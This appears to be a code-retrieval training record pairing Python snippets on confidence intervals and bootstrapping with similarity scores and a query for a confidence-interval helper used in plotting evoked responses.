[np.quantile(framed_evals, prop_cut, axis=0),\n np.quantile(framed_evals, 1 - prop_cut, axis=0)]\n else:\n tdist = scipy.stats.t\n std_eval = self.get_sem()\n means = self.get_means()\n ci = [means + std_eval * tdist.ppf(prop_cut, self.dof),\n means - std_eval * tdist.ppf(prop_cut, self.dof)]\n return ci", "def mean_confidence_interval(data, confidence=0.95):\n\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, m-h, m+h", "def a_test_predict_is_intervals_bbvi():\n model = ARIMAX(formula=\"y ~ x1\", data=data, ar=2, ma=2, family=Exponential())\n x = model.fit('BBVI', iterations=100)\n predictions = model.predict_is(h=10, intervals=True)\n assert(np.all(predictions['99% Prediction Interval'].values >= predictions['95% Prediction Interval'].values))\n assert(np.all(predictions['95% Prediction Interval'].values >= predictions['5% Prediction Interval'].values))\n assert(np.all(predictions['5% Prediction Interval'].values >= predictions['1% Prediction Interval'].values))", "def a_test_predict_intervals_bbvi():\n model = ARIMAX(formula=\"y ~ x1\", data=data, ar=2, ma=2, family=Exponential())\n x = model.fit('BBVI', iterations=100)\n predictions = model.predict(h=10, oos_data=data_oos, intervals=True)\n\n assert(np.all(predictions['99% Prediction Interval'].values >= predictions['95% Prediction Interval'].values))\n assert(np.all(predictions['95% Prediction Interval'].values >= predictions['5% Prediction Interval'].values))\n assert(np.all(predictions['5% Prediction Interval'].values >= predictions['1% Prediction Interval'].values))", "def non_param_paired_ci(sample1, sample2, alpha):\n n = len(sample1)\n N = norm.ppf(1 - alpha/2)\n diff_sample = sorted(list(map(operator.sub, sample2, sample1)))\n averages = sorted([(s1+s2)/2 for i, s1 in enumerate(diff_sample)\n for _, s2 in enumerate(diff_sample[i:])])\n k = np.math.ceil(n*(n+1)/4 - (N * (n*(n+1)*(2*n+1)/24)**0.5))\n CI = (round(averages[k-1], 3), round(averages[len(averages)-k], 3))\n return CI", "def test_pvalue_from_bootstrapping(perfectModelEnsemble_initialized_control, metric):\n sig = 95\n pm = perfectModelEnsemble_initialized_control.isel(lead=[0, 1, 2])\n actual = (\n pm.bootstrap(\n metric=metric,\n iterations=ITERATIONS,\n comparison=\"e2c\",\n sig=sig,\n dim=\"init\",\n reference=\"uninitialized\",\n )\n .sel(skill=\"uninitialized\", results=\"p\")\n .isel(lead=0)\n )\n # check that significant p-value\n assert actual.tos.values < 2 * (1 - sig / 100)\n # lead units keep\n assert actual.lead.attrs[\"units\"] == \"years\"", "def get_eq_n_intervals(array):\n mean = np.mean(array)\n std = 2 # Fixed std. Too extreme values when using std from the array (either 0 or 127).\n # This is very likely because np.std(array) is the standard deviation of all the points of the\n # embedded espace, but what we use in the end is the difference between those points. Calculate \n # the standard deviation between all posible distances is not really very affordable to keep this\n # low resource consuming, and also it hard to generalise when you want to use more than 2 words \n # to calculate the distance. 2 seems to work very good. You can try to fine tune it\n # more if you feel like it.\n\n norm = stats.norm(mean, std)\n intervals = norm.ppf(np.linspace(0, 1, 129))\n return intervals", "def plot_confidence_interval_for_data (model, X):\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n preds_ds = pd.DataFrame()\n preds_ds['mean'] = preds.mean(axis=1)\n preds_ds['std'] = preds.std(axis=1)\n\n fig = plt.figure(figsize=(15,6))\n my_xticks = ['datapoint ' + str(i+1) for i in list(preds_ds.index)]\n plt.errorbar(x = preds_ds.index, y=preds_ds['mean'], yerr=preds_ds['std'], \n fmt='o', color='blue', ecolor='lightblue', capsize=3)\n plt.title('Confidence Interval for the predicted value')\n plt.xticks(preds_ds.index, my_xticks)\n for i in list(preds_ds.index):\n m, std = round(preds_ds['mean'][i],1), round(preds_ds['std'][i],2)\n s=f' pred={m} \\n std dev= {std}'\n plt.text(x = i, y=preds_ds['mean'][i], s=s ) \n plt.show()", "def _lower_confidence_bound(self, NA: int, N: int, alpha: float) -> float:\n return proportion_confint(NA, N, alpha=2 * alpha, method=\"beta\")[0]", "def bootstrapping(\n self,\n estimator,\n estimator_inputs,\n qoi_mean: Union[NumpyFloatArray, NumpyIntArray],\n num_bootstrap_samples: PositiveInteger = None,\n confidence_level: PositiveFloat = 0.95,\n **kwargs,\n ):\n\n n_qois = qoi_mean.shape[0]\n n_outputs = qoi_mean.shape[1]\n\n ##################### STORAGE #####################\n\n # store generators of the inputs for bootstrap sampling\n input_generators = []\n\n # store the qoi computed using bootstrap samples\n bootstrapped_qoi = np.zeros((n_outputs, n_qois, num_bootstrap_samples))\n\n # store the confidence interval for each qoi\n confidence_interval_qoi = np.zeros((n_outputs, n_qois, 2))\n\n self._create_generators(estimator_inputs, input_generators)\n\n self._evaluate_boostrap_sample_qoi(bootstrapped_qoi, estimator, input_generators, kwargs, num_bootstrap_samples)\n\n confidence_interval_qoi = self._calculate_confidence_intervals(bootstrapped_qoi, confidence_interval_qoi,\n confidence_level, n_outputs, qoi_mean)\n\n return confidence_interval_qoi", "def empirical_bootstrap(self, pop_data: np.ndarray, n = None, B = 1000, func=None):\n # store the estimates for each bootstrapped sample\n n = pop_data.shape[0] if n is None else n\n boot_est = [None] * B\n index = 0\n for _ in range(B):\n idx = np.random.randint(low=0, high=n, size=n)\n est = func(pop_data[idx], axis=0)\n boot_est[index] = est\n index += 1\n \n result = {}\n result['estimates'] = boot_est\n result['est_mean'] = np.mean(boot_est)\n result['est_err'] = np.std(boot_est, ddof=1)\n \n return result", "def get_confidence_interval(\n num_people,\n num_iter=1000000,\n percentile=2.576,\n num_days=365,\n):\n mean = 0.0\n variance = 0.0 # not exactly\n for i in range(1, num_iter + 1):\n x = [randint(1, num_days) for person in range(num_people)]\n x.sort()\n is_consecutive = any(p + 1 == q for (p, q) in zip(x[:-1], x[1:], strict=True))\n is_a_loop = x[0] + num_days - 1 == x[-1]\n is_positive = int(is_consecutive or is_a_loop)\n delta = is_positive - mean\n mean += delta / float(i)\n variance += delta * (is_positive - mean)\n sd = sqrt(variance / float(num_iter - 1))\n lower_bound = mean - percentile * sd / sqrt(num_iter)\n upper_bound = mean + percentile * sd / sqrt(num_iter)\n print(\n \"Number of people: {}\\tLower bound: {:2.5%}\\tUpper bound: {:2.5%}\".format(\n num_people,\n lower_bound,\n upper_bound,\n ),\n )\n return lower_bound, upper_bound", "def main():\n df = pd.read_csv('data/Boston.csv')\n n_obs = len(df)\n np.random.seed(111)\n\n # Part a\n medv_mean = np.mean(df['medv'])\n print('medv mean = {:.3f}'.format(medv_mean))\n\n # Part b\n medv_stan_err = statistics.stdev(df['medv']) / np.sqrt(n_obs)\n print('medv standard error = {:.5f}'.format(medv_stan_err))\n\n # Part c\n n_boot_iters = 10000\n medv_mean_array = np.zeros(n_boot_iters)\n for ii in range(n_boot_iters):\n ind = np.random.choice(n_obs, n_obs, replace=True)\n medv_mean_array[ii] = np.mean(df.loc[ind, 'medv'])\n\n medv_stan_err_boot = statistics.stdev(medv_mean_array)\n print('medv standard error (bootstrap) = {:.5f}'.format(medv_stan_err_boot))\n\n # Part d\n ci_95 = [medv_mean - 2 * medv_stan_err,\n medv_mean + 2 * medv_stan_err]\n ci_95_boot = [medv_mean - 2 * medv_stan_err_boot,\n medv_mean + 2 * medv_stan_err_boot]\n print('95% CI = [{:.3f}, {:.3f}]'.format(ci_95[0], ci_95[1]))\n print('95% CI (bootstrap) = [{:.3f}, {:.3f}]'.format(ci_95_boot[0], ci_95_boot[1]))\n\n # Part e\n medv_med = np.median(df['medv'])\n print('medv med = {:.3f}'.format(medv_med))\n\n # Part f\n medv_med_array = np.zeros(n_boot_iters)\n for ii in range(n_boot_iters):\n ind = np.random.choice(n_obs, n_obs, replace=True)\n medv_med_array[ii] = np.median(df.loc[ind, 'medv'])\n\n medv_med_stan_err_boot = statistics.stdev(medv_med_array)\n print('medv median standard error (bootstrap) = {:.5f}'.format(medv_med_stan_err_boot))\n\n # Part g\n medv_10 = np.percentile(df['medv'], 10)\n print('medv 10th percentile = {:.3f}'.format(medv_10))\n\n # Part f\n medv_10_array = np.zeros(n_boot_iters)\n for ii in range(n_boot_iters):\n ind = np.random.choice(n_obs, n_obs, replace=True)\n medv_10_array[ii] = np.percentile(df.loc[ind, 'medv'], 10)\n\n medv_10_stan_err_boot = statistics.stdev(medv_10_array)\n print('medv 10th percenile standard error (bootstrap) = {:.5f}'.format(medv_10_stan_err_boot))", "def estimate_noiseperbl(data):\n\n # define noise per baseline for data seen by detect_bispectra or image\n datamean = data.mean(axis=2).imag # use imaginary part to estimate noise without calibrated, on-axis signal\n noiseperbl = datamean.std() # measure single noise for input to detect_bispectra\n logger.debug('Measured noise per baseline of {0:.3f}'.format(noiseperbl))\n return noiseperbl", "def get_confidence_interval(self,a,b):\n\t\tk_vals,prob_vals = self.tuple_of_probabilities\n\t\tworking_indices = [i for i,v in enumerate(k_vals) if (v >= a and v<= b)]\n\t\tworking_prob_vals = [prob_vals[i] for i in working_indices]\n\t\treturn sum(working_prob_vals)", "def test_conf_interval_ecdf_method(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n\n # ``quantile_estimation_method = \"ecdf\"``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"ecdf\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n pred_df[ERR_STD_COL] = round(pred_df[ERR_STD_COL], 2)\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.32, 289.38, 291.3, 291.34), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.63, -5.56, -4.13, -4.08), (\n \"quantiles are incorrect\")\n expected_stds = [0.29, 0.42, 0.42, 0.42, 0.42, 0.58, 0.58, 0.58, 0.58, 0.58,\n 0.58, 0.42]\n assert list(pred_df[ERR_STD_COL].values) == expected_stds", "def bootstrap_mean(x, n=100):\n out = []\n\n for i in range(n):\n idx = pd.Series(np.arange(len(x))).sample(frac=1.0, replace=True).values\n out.append(x[idx].mean(0))\n outm = np.stack(out)\n return outm.mean(0), outm.std(0)", "def NbIntervals(self, *args):\n return _Adaptor3d.Adaptor3d_Curve_NbIntervals(self, *args)", "def create_interval_NEW(confidence, samples=False, n_samples=False, sample_mean=False, sd=False, true_std=False, is_prob=False, is_normal=False, side=\"both\"):\n h = 0\n\n if samples:\n n_samples = len(samples)\n sample_mean = float(np.mean(samples))\n sd = float(np.std(samples))\n std_err = float(st.sem(samples))\n else:\n if sd is False and n_samples < 30:\n raise Exception(\"confidence intervals\", \"Missing standard deviation to estimate mean with less than 30 samples.\")\n else:\n std_err = sd / math.sqrt(n_samples)\n\n if side == \"both\":\n alpha = (1 - confidence) / 2\n z = st.norm.ppf(1 - (1 - confidence) / 2)\n t = st.t.ppf((1 + confidence) / 2, n_samples - 1)\n else:\n alpha = (1 - confidence)\n z = st.norm.ppf(1 - (1 - confidence))\n t = st.t.ppf((1 + confidence), n_samples - 1)\n\n if is_prob: ## CI for probabilities\n if sample_mean == 0: ## Rule of three\n return Interval(0, 3/n_samples)\n elif sample_mean == 1: ## Rule of three\n return Interval(1 - 3/n_samples, 1)\n elif n_samples >= 30: ## Binomial proportion confidence interval: Normal/Gaussian distribution of the proportion: https://machinelearningmastery.com/confidence-intervals-for-machine-learning/\n h = z * math.sqrt((sample_mean * (1 - sample_mean)) / n_samples)\n elif n_samples < 30:\n interval = st.bayes_mvs(samples, confidence)[0][1] ## 0 is the mean, 1 is the interval estimate\n return Interval(interval[0], interval[1])\n ## h = t * math.sqrt((mean * (1 - mean)) / n_samples) ## TODO, check this\n else: ## CI for usual values\n if (n_samples >= 30 or is_normal) and true_std is not False: ## use Normal Distribution\n h = z * true_std / math.sqrt(n_samples)\n elif is_normal: ## use Student distribution\n # h = t * s / math.sqrt(n_samples)\n h = t * std_err\n else:\n interval = st.bayes_mvs(samples, confidence)[0][1] ## 0 is the mean, 1 is the interval estimate\n return Interval(interval[0], interval[1])\n\n h = float(h)\n if side == \"both\":\n return Interval(sample_mean - h, sample_mean + h)\n elif side == \"right\":\n if is_prob:\n return Interval(0, sample_mean + h)\n else:\n return Interval(float('-inf'), sample_mean + h)\n else:\n if is_prob:\n return Interval(sample_mean - h, 1)\n else:\n return Interval(sample_mean - h, float('inf'))", "def eg_pre():\n\n print(\"\\teg3\")\n\n d = 1\n\n for _ in range(10):\n t1 = []\n t2 = []\n\n for _ in range(32):\n t1.append(utils.gaussian(10, 1))\n t2.append(utils.gaussian(d * 10, 1))\n\n print(\"\", \"\", d, d < 1.1, stats.bootstrap(\n t1, t2), stats.bootstrap(t1, t1), sep=\"\\t\")\n\n d = round(d + .05, 2)", "def bootstrapping_variance_estimation(data, iterations=100):\n bootstrapped_variance = []\n for i in tqdm(range(1)):\n data_at_index_i = [elem for elem in data]\n\n variance_estimation = []\n for _ in range(iterations):\n bootstrapped_data = []\n for _ in range(len(data_at_index_i)):\n bootstrapped_data.append(np.random.choice(data_at_index_i))\n variance_estimation.append(np.var(bootstrapped_data))\n\n bootstrapped_variance.append(np.mean(variance_estimation, axis=0))\n\n return bootstrapped_variance", "def _boot_h(h, x, y):\n n = 100\n ind = np.random.randint(x.shape[0], size=n)\n # allocate output\n out = np.empty(n)\n # Loop through each bootstrap point\n for i in range(n):\n # all-1 points\n xx = np.delete(x, i, axis=0)\n yy = np.delete(y, i, axis=0)\n z = (xx - x[i, :]) / h\n out[i] = _nadaraya_watson(z, yy)\n cv = np.sum((y[ind] - out)**2) / float(n)\n\n return cv", "def calc_error(datasample,boots_num):\r\n mse_list=[]\r\n datasample=df_to_array(datasample)\r\n for i in range(boots_num):\r\n boots_indexs,missing_indexs=bootstrapping(datasample)\r\n \r\n boostrapped_data=datasample[boots_indexs][0]\r\n \r\n boots_outsample_data=datasample[missing_indexs]\r\n \r\n\r\n # Train the model \r\n rf_kernal=Model_Train(boostrapped_data)\r\n \r\n # Test the model\r\n test_features=boots_outsample_data[:,:-1]\r\n test_labels=boots_outsample_data[:,-1]\r\n pred=rf_kernal.predict(test_features)\r\n \r\n \r\n # Can change to MAE, MSE\r\n \r\n me=np.mean(pred-test_labels)\r\n #mse=np.mean((pred-train_labels)**2)\r\n #mae=np.mean(np.abs(pred-train_labels))\r\n \r\n mse_list.append(me)\r\n print('Estimated Out of Sample Error=%f'%(np.mean(mse_list)))\r\n return np.mean(mse_list)", "def get_t_CI(self, alpha):\n mean = self.get_mean()\n hl = self.get_t_half_length(alpha)\n\n return [mean - hl, mean + hl]", "def binom_bca_bootstrap_err(k, n, B=10000, CL=[0.025, 0.975], acceleration=True, return_full=False):\n theta_MLE = k/n\n k_i = bootstrap_sample_binomial(k, n, B)\n\n # Bootstrap estimates of the parameter\n theta_i = k_i / n\n theta0_star = np.sum(theta_i) / B\n print(f'theta_MLE = {theta_MLE}, theta0_star = {theta0_star}')\n\n # -------------------------------------------------\n # Original binomial sample created as a vector\n x = np.zeros(n) \n x[0:k] = 1 # 1 == success\n\n # We are interested in the mean\n def t_func(x):\n return np.sum(x) / n\n\n # Jackknife the sample\n mu,sigma,d = jackknife_1D(x, t_func)\n print(f'mu = {mu}, sigma = {sigma}')\n\n # Calculate acceleration\n if acceleration:\n a = bootstrap_acceleration(d)\n else:\n a = 0\n print(f'a = {a}')\n # -------------------------------------------------\n\n # Empirical CDF\n xs,ys = ecdf(theta_i)\n \n # Construct CDF and inverse CDF\n G_cdf = lambda x : interp1d(xs, ys, kind='nearest', fill_value='extrapolate')(x)\n G_invcdf = lambda y : interp1d(ys, xs, kind='nearest', fill_value='extrapolate')(y)\n\n # z0 = \\Phi^{-1} \\hat{G}( \\hat{\\theta} )\n z0 = norm.ppf( G_cdf( theta_MLE ) )\n print(f'z0 = {z0}')\n \n # BCA interval estimates\n interval = np.zeros(len(CL))\n for i in range(len(CL)):\n z_alpha = norm.ppf(CL[i])\n interval[i] = G_invcdf( norm.cdf(z0 + (z0 + z_alpha)/(1 - a*(z0 + z_alpha))) )\n\n if return_full == True:\n return interval,d,a,k_i\n else:\n return interval", "def bootstrap(data, num_samples, statistic, alpha):\n n = len(data)\n idx = npr.randint(0, n, (num_samples, n))\n samples = x[idx]\n stat = np.sort(statistic(samples, 1))\n return (stat[int((alpha/2.0)*num_samples)],\n stat[int((1-alpha/2.0)*num_samples)])", "def test_robbins_confidence(self):\n c = array([1,2,3,0,1])\n r = robbins_confidence(c, 0.05)\n n = 7\n s = 2\n k = sqrt(8/0.05)\n self.assertEqual(r, ((s-k)/(n+1), (s+k)/(n+1)))", "def bootstrapped_rmse_difference(x1,x2, perc=5, N=1000):\n assert(len(x1)==len(x2))\n n_samples = len(x1)\n means = []\n for i in range(N):\n indices = np.random.choice(n_samples, replace=True, size=n_samples)\n # now compute difference in RMSE on this subsample\n mm = np.sqrt(np.mean(x1[indices]**2)) - np.sqrt(np.mean(x2[indices]**2))\n means.append(mm)\n means = np.array(means)\n mmean = np.sqrt(np.mean(x1**2)) - np.sqrt(np.mean(x2**2))\n upper = np.percentile(means, q=100 - perc)\n lower = np.percentile(means, q=perc)\n # assert (upper >= lower) # we deactivate this check here because if one or both of x1 and x2\n # concist only of repreated values, then numerical inaccuracis can lead to\n # lower being a tiny little larger than upper (even though they should be the same in this case)\n return np.array([mmean, lower, upper])", "def mean_confidence_interval(data, confidence=0.95):\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), stats.sem(a)\n h = se * stats.t._ppf((1 + confidence) /2., n - 1)\n return m, m - h, m + h", "def fit_predictCI(self, y, x, ndays, bootstrap, n_jobs = None):\n os.remove(\"report.log\")\n #Make some parameters avaliable\n self.x = x\n self.y = np.array(y)\n self.ndays = len(self.x) + ndays\n \n \n #Create a lol with data for run the model\n lists = self.__bootstratpTS(npArray = self.y, replicate = bootstrap)\n \n #Model will be fitted and predicted so R) using ci is not consisent\n #Make cores avalible to the process\n pool = mp.Pool(processes = n_jobs)\n \n #Run the model\n results = pool.starmap(self.runSir, [(lists[i], self.x, self.ndays) for i in range(0,len(lists))])\n\n self.preds = [results[i][0] for i in range(0,len(lists))] #get predictions\n\n a = [results[i][1][0] for i in range(0,len(lists))] #get a\n b = [results[i][1][1] for i in range(0,len(lists))] #get b\n lim_inf, med, lim_sup = self.__computeCI()\n \n \n return {\"a\": a, \"b\": b, \"lim_inf\": lim_inf, \"med\": med, \"lim_sup\": lim_sup}", "def errors_experiment(data, conf):\n\n mean = np.sum(data / conf ** 2) / np.sum(1 / conf ** 2)\n error = np.sum(1 / conf ** 2) ** (-1 / 2)\n error = max(error, np.max(conf))\n\n return mean, error", "def does_ci_narrow(mean1, ci1, mean2, ci2):\n\n assert ci1 >= 0.0 and ci2 >= 0.0, 'Found negative confidence interval from bootstrapping.'\n if abs(ci1 - ci2) < CI_MINIUM_SIGNIFICANT_NARROWING:\n return SAME\n x1 = mean1 - ci1\n y1 = mean1 + ci1\n x2 = mean2 - ci2\n y2 = mean2 + ci2\n return does_interval_narrow((x1, y1), (x2, y2))" ]
[ "0.6679884", "0.6648013", "0.6620062", "0.66174746", "0.6499037", "0.646875", "0.6136825", "0.6136825", "0.61319476", "0.6111559", "0.60788226", "0.6075902", "0.6074073", "0.5812202", "0.5790033", "0.57862234", "0.57668763", "0.57511514", "0.574001", "0.5700028", "0.5675738", "0.5670809", "0.56043696", "0.5597088", "0.5589453", "0.55657214", "0.5554705", "0.5529725", "0.5524544", "0.5507186", "0.5500882", "0.54704136", "0.54690397", "0.5447993", "0.5446354", "0.5439081", "0.54360664", "0.5417386", "0.54119116", "0.5395196", "0.53788257", "0.5376365", "0.5365907", "0.53559154", "0.53549784", "0.53479934", "0.5343954", "0.5330144", "0.53156215", "0.53034174", "0.5299938", "0.5292536", "0.52743024", "0.52701384", "0.52659225", "0.52585584", "0.5256971", "0.52417105", "0.52384967", "0.52251714", "0.52168626", "0.51571727", "0.51563853", "0.5154822", "0.5152408", "0.5114885", "0.5111021", "0.5104804", "0.5100056", "0.5093388", "0.5091186", "0.5090804", "0.5088325", "0.5081332", "0.5072357", "0.50688773", "0.5068325", "0.5059719", "0.50495857", "0.5047843", "0.50404525", "0.5040308", "0.5037232", "0.5030829", "0.5025745", "0.50181663", "0.50153464", "0.50053704", "0.5001538", "0.5001346", "0.4999432", "0.49981588", "0.49963424", "0.49874413", "0.49840617", "0.49830377", "0.4975638", "0.4973256", "0.49685064", "0.4958472" ]
0.6944301
0
Calculate confidence interval. Aux function for plot_compare_evokeds.
def _ci(arr, ci=0.95, method="bootstrap", n_bootstraps=2000, random_state=None): if method == "bootstrap": return bootstrap_confidence_interval( arr, ci=ci, n_bootstraps=n_bootstraps, random_state=random_state ) else: from .parametric import _parametric_ci return _parametric_ci(arr, ci=ci)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def confidence_interval(self):\r\n coh_var = np.zeros((self.input.data.shape[0],\r\n self.input.data.shape[0],\r\n self._L), 'd')\r\n for i in range(self.input.data.shape[0]):\r\n for j in range(i):\r\n if i != j:\r\n coh_var[i, j] = tsu.jackknifed_coh_variance(\r\n self.spectra[i],\r\n self.spectra[j],\r\n self.eigs,\r\n adaptive=self._adaptive\r\n )\r\n\r\n idx = triu_indices(self.input.data.shape[0], 1)\r\n coh_var[idx[0], idx[1], ...] = coh_var[idx[1], idx[0], ...].conj()\r\n\r\n coh_mat_xform = tsu.normalize_coherence(self.coherence,\r\n 2 * self.df - 2)\r\n\r\n lb = coh_mat_xform + dist.t.ppf(self.alpha / 2,\r\n self.df - 1) * np.sqrt(coh_var)\r\n ub = coh_mat_xform + dist.t.ppf(1 - self.alpha / 2,\r\n self.df - 1) * np.sqrt(coh_var)\r\n\r\n # convert this measure with the normalizing function\r\n tsu.normal_coherence_to_unit(lb, 2 * self.df - 2, lb)\r\n tsu.normal_coherence_to_unit(ub, 2 * self.df - 2, ub)\r\n\r\n return ub - lb", "def confidence_interval(data, control_label=None, *args, **kwargs):\n def fn(control, test):\n c_means = CompareMeans(DescrStatsW(test), DescrStatsW(control))\n if _is_proportion(control, test):\n return c_means.zconfint_diff()\n else:\n return c_means.tconfint_diff()\n\n return _apply(data, fn, control_label)", "def confidenceInterval(start,end,confidence):\n\n\tmean = 0.5*(end+start)\n\tstddev = getStdDev(0.5*(end-start), confidence)\n\n\treturn (mean,stddev)", "def compute_confidence_interval(data):\n a = 1.0 * np.array(data)\n m = np.mean(a)\n std = np.std(a)\n pm = 1.96 * (std / np.sqrt(len(a)))\n return m, pm", "def plot_confidence_interval_for_data (model, X):\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n preds_ds = pd.DataFrame()\n preds_ds['mean'] = preds.mean(axis=1)\n preds_ds['std'] = preds.std(axis=1)\n\n fig = plt.figure(figsize=(15,6))\n my_xticks = ['datapoint ' + str(i+1) for i in list(preds_ds.index)]\n plt.errorbar(x = preds_ds.index, y=preds_ds['mean'], yerr=preds_ds['std'], \n fmt='o', color='blue', ecolor='lightblue', capsize=3)\n plt.title('Confidence Interval for the predicted value')\n plt.xticks(preds_ds.index, my_xticks)\n for i in list(preds_ds.index):\n m, std = round(preds_ds['mean'][i],1), round(preds_ds['std'][i],2)\n s=f' pred={m} \\n std dev= {std}'\n plt.text(x = i, y=preds_ds['mean'][i], s=s ) \n plt.show()", "def get_confidence_interval(self,a,b):\n\t\tk_vals,prob_vals = self.tuple_of_probabilities\n\t\tworking_indices = [i for i,v in enumerate(k_vals) if (v >= a and v<= b)]\n\t\tworking_prob_vals = [prob_vals[i] for i in working_indices]\n\t\treturn sum(working_prob_vals)", "def confidence(self) -> float:\n return self._confidence", "def test_confidence_intervals(self):\n # Taken from a T-Test table\n\n # Two Tailed\n p, ci = _p_value_and_confidence_intervals(2.228, 10, 'two')\n\n self.assertAlmostEqual(p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n np.testing.assert_allclose(ci, [-2.228, 2.228], atol=.001)\n\n # Left One-Tailed\n p, ci = _p_value_and_confidence_intervals(1.895, 7, 'left')\n\n self.assertAlmostEqual(p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n self.assertTrue(np.isinf(ci[0]))\n np.testing.assert_allclose(ci, [-np.inf, 1.895], atol=.001)\n\n # Right One-Tailed\n p, ci = _p_value_and_confidence_intervals(1.761, 14, 'right')\n\n self.assertAlmostEqual(1-p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n self.assertTrue(np.isinf(ci[1])) \n np.testing.assert_allclose(ci, [-1.761, np.inf], atol=.001)", "def compute_confidence_interval(self) -> bool:\n return False", "def confidence_intervals(data):\r\n\r\n x_bar = np.nanmean(data) # Mean value\r\n s = np.nanstd(data) # Standard deviation\r\n n = len(data) # Sample size\r\n\r\n lo_conf = x_bar - (1.96 * (s / np.sqrt(n))) # Lower bound of confidence interval\r\n hi_conf = x_bar + (1.96 * (s / np.sqrt(n))) # Upper bound of confidence interval\r\n\r\n conf_range = hi_conf - lo_conf # Size of the 95% confidence interval\r\n\r\n return lo_conf, hi_conf, conf_range", "def confidence(self) -> float:\n return float(self.class_scores[self.class_num])", "def confidence(self):\n return self._confidence", "def confidence(self):\n return self._confidence", "def get_confidence_interval(self, scores, ci_method='bca', ci_size=0.95, replications=100000, seed_value=None):\n def score(x):\n return np.array([x.mean()])\n data = np.array([float(score) for score in scores])\n if min(data) == max(data):\n return tuple([min(data), max(data)])\n bs = IIDBootstrap(data)\n if seed_value is not None:\n bs.seed(seed_value)\n ci = bs.conf_int(score, replications, method=ci_method, size=ci_size, tail='two')\n return tuple([ci[0][0], ci[1][0]])", "def compute_credible_interval(vals, weights, confidence: float = 0.95):\n if confidence <= 0.0 or confidence >= 1.0:\n raise ValueError(\n f\"Confidence {confidence} must be in the interval (0.0, 1.0).\"\n )\n alpha_lb = 0.5 * (1.0 - confidence)\n alpha_ub = confidence + alpha_lb\n lb = compute_quantile(vals, weights, alpha_lb)\n ub = compute_quantile(vals, weights, alpha_ub)\n return lb, ub", "def do_mean_cis_differ(mean1, ci1, mean2, ci2):\n\n assert ci1 >= 0.0 and ci2 >= 0.0, 'Found negative confidence interval from bootstrapping.'\n x1 = mean1 - ci1\n y1 = mean1 + ci1\n x2 = mean2 - ci2\n y2 = mean2 + ci2\n return do_intervals_differ((x1, y1), (x2, y2))", "def _confidence_interval_function(xq, cinfo):\n a = cinfo.a.copy()\n a[cinfo.indx] = xq\n\n yfit, _ = cinfo.fit_function(a, pderflg=False)\n if yfit.dtype in ['complex64','complex128']:\n yfit = np.concatenate([yfit.real,yfit.imag])\n wchisqr1 = np.sum(cinfo.ww*(yfit-cinfo.dat)**2)/cinfo.nfree\n \n goal = abs(wchisqr1-cinfo.wchi*cinfo.factor)\n \n return goal", "def calculate_confidence_interval(input_data, confidence_coeficient=0.95):\n error_margin = ExperimentUtil._calculate_error_margin(input_data, confidence_coeficient)\n superior_limit = statistics.mean(input_data) + error_margin\n inferior_limit = statistics.mean(input_data) - error_margin\n return superior_limit, inferior_limit", "def ci_diff_prop(p1, p2, n1, n2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n prop_diff = p1 - p2\n # find the z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n margin_of_error = z_star * (np.sqrt((p1 * (1 - p1) / n1) + (p2 * (1 - p2) / n2)))\n # calculate the lower and upper bound\n lcb = prop_diff - margin_of_error\n ucb = prop_diff + margin_of_error\n print(\n \"{}% Confidence Interval for difference in two Population proportions: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def confidence_intervals(self, level = 95):\n margin = (100 - level) / 2 # interval is middle level% of vals, so this is margin to either side of it\n try:\n len(self.binom_control)\n len(self.binom_treatment)\n\n except:\n self.binom_distribution()\n\n control = self.binom_control\n treatment = self.binom_treatment\n\n control_upper = np.percentile(a = control, q = level + margin)\n control_lower = np.percentile(a = control, q = margin)\n self.interval_control = {'lower': control_lower, 'upper':control_upper, 'level':level}\n\n treatment_upper = np.percentile(a = treatment, q = level + margin)\n treatment_lower = np.percentile(a = treatment, q = margin)\n self.interval_treatment = {'lower': treatment_lower, 'upper':treatment_upper, 'level':level}\n\n return self.interval_control, self.interval_treatment", "def t_confidence_Interval_Difference_Of_Means(xSamples, ySamples, confidence):\n try:\n if len(xSamples) >= 30 or len(ySamples) >= 30:\n raise sampleSizeError(\"Should use normal distribution instead. m or n > 30.\")\n \n if confidence > 1:\n confidence = confidence / 100.0\n print(f\"Converting confidence interval to {confidence}\")\n\n elif type(confidence) != int or type(confidence) != float:\n raise ValueError(\"Confidence Interval must be a numeric value\")\n \n # Find mean and variance for both sample distributions\n n = len(xSamples) \n xBar = sample_mean(xSamples)\n xSampStd = sample_variance(xSamples) ** .5\n \n m = len(ySamples)\n yBar = sample_mean(ySamples)\n ySampStd = sample_variance(ySamples) ** .5\n \n # Find t at alpha/2 and the new distribution's sample size - 2\n # Calculate the sample pooling standard deviation\n tAlpha = (1 + confidence) / 2.0\n t = scipy.stats.t.ppf(tAlpha, (m + n - 2)) \n spsd = ((((n - 1)* (xSampStd**2)) + ((m - 1) * (ySampStd**2)))/(m + n - 2)) ** .5 \n \n # Find the lower and upper bound \n # (X-Y) (+/-) t((spsd * (((1/m)+(1/n)) **.5))\n 